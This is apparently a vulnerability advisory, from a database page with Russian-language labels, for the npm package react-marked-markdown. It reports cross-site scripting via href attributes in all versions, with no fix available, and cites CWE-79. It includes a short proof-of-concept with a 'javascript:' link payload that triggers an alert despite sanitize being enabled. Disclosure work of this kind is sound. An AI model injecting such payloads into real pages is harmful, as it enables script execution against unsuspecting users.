Описание
Cross-Site Scripting in react-marked-markdown
All versions of react-marked-markdown are vulnerable to cross-site scripting (XSS) via href attributes. This is exploitable if user is provided to react-marked-markdown
Proof of concept:
import React from 'react'
import ReactDOM from 'react-dom'
import { MarkdownPreview } from 'react-marked-markdown'
ReactDOM.render(
<MarkdownPreview
markedOptions={{ sanitize: true }}
value={'[XSS](javascript: alert`1`)'}
/>,
document.getElementById('root')
)
Recommendation
No fix is currently available for this vulnerability. It is our recommendation to not install or use this module at this time if you allow user input into href values.
Пакеты
Наименование
react-marked-markdown
npm
Затронутые версииВерсия исправления
>= 0.0.0
Отсутствует
Дефекты
CWE-79
Дефекты
CWE-79